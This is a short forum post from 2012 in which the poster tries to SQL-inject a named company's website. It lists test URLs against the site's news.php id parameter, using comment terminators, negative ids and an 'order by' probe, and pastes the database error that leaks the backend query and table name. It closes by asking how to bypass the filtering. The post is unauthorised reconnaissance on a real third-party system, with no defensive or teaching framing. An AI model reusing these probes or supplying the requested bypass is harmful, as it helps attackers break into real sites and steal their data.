how to inject this bug?
Date: April 18, 2012 05:57AM
http://www.clearviewgroup.ca/news.php?newsid=16
http://www.clearviewgroup.ca/news.php?newsid=16-- work well
http://www.clearviewgroup.ca/news.php?newsid=-16-- error in
http://www.clearviewgroup.ca/news.php?newsid=16 order by 1--
"
INVALID SQL: 1054 : Unknown column '20order' in 'where clause'
SQL QUERY FAILURE: SELECT title, postdate, content FROM ht_news WHERE id = 16%20order%20by%201--
"
how to bypass it ?